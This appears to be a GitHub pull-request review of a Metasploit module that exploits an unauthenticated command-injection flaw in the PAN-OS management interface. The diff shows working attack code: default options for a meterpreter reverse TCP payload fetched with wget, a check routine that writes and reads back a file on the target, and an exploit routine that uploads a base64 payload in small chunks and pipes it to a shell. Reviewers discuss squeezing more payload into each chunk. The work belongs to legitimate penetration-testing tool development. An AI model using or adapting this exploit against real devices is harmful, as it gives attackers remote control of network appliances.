modules/exploits/linux/http/panos_management_unauth_rce.rb

```diff
@@ -0,0 +1,197 @@
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+          'FETCH_COMMAND' => 'WGET',
+          'RPORT' => 443,
+          'SSL' => true,
+          'FETCH_WRITABLE_DIR' => '/var/tmp'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  # Our check routine leverages the two vulnerabilities to write a file to disk, which we then read back over HTTPS to
+  # confirm the target is vulnerable. The check routine will delete this file after it has been read.
+  def check
+    check_file_name = Rex::Text.rand_text_alphanumeric(4)
+
+    # NOTE: We set dontfail to true, as a check routine cannot fail_with().
+
+    return CheckCode::Unknown unless execute_cmd(
+      "echo #{check_file_name} > /var/appweb/htdocs/unauth/#{check_file_name}",
+      dontfail: true
+    )
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri('unauth', check_file_name)
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    if res.code == 200 && res.body.include?(check_file_name)
+
+      return CheckCode::Unknown unless execute_cmd(
+        "rm -f /var/appweb/htdocs/unauth/#{check_file_name}",
+        dontfail: true
+      )
+
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  end
+
+  # We can only execute a short command upon each invocation of the command injection vulnerability. To execute
+  # a Metasploit payload, we base64 encode our payload, and write it to a file, but we do the file write in small
+  # chunks. Additionally, the command injection may trigger twice per invocation. To overcome this we store each
+  # chunk in a unique, sequential file, so that if invoked twice, we still end up with the same file for that chunk.
+  # We then amalgamate all these chunks together into a single file, reconstituting the original base64 encoded
+  # payload, Finally we base64 decode the payload, and pipe it to a shell to execute. To avoid our payload being
+  # executed twice, the payload will delete the single base64 payload file upon the first execution of the payload,
+  # causing any second attempt to execute the payload to fail.
+  def exploit
+    tmp_file_name = Rex::Text.rand_text_alphanumeric(4)
+
+    cmd = "rm -f #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}*; #{payload.encoded}"
+
+    payload = Base64.strict_encode64(cmd)
+
+    idx = 1
+
+    chunk_size = 30
+
+    max_idx = (payload.length / chunk_size) + 1
+
+    while payload && !payload.empty?
+
+      print_status("Uploading payload chunk #{idx} of #{max_idx}...")
+
+      chunk = payload[0, chunk_size]
+
+      payload = payload[chunk_size..]
+
+      execute_cmd("echo -n '#{chunk}' > #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}#{idx}")
```

Comment:
```suggestion
      execute_cmd("echo -n '#{chunk}'>#{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}#{idx}")
```

Reply:
This would allow to send two more chars of the payload per iteration.

Reply:
I added commit [de599a4](https://github.com/rapid7/metasploit-framework/pull/19663/commits/de599a4407f0249909e427dc33130a38e64ffb26) which now calculates the max size a chunk can be for any iteration of writing a chunk. I also reworked how the files are made to be sequential when amalgamating them, which affects the chunk size. Thanks @jvoisin, appreciate you review :)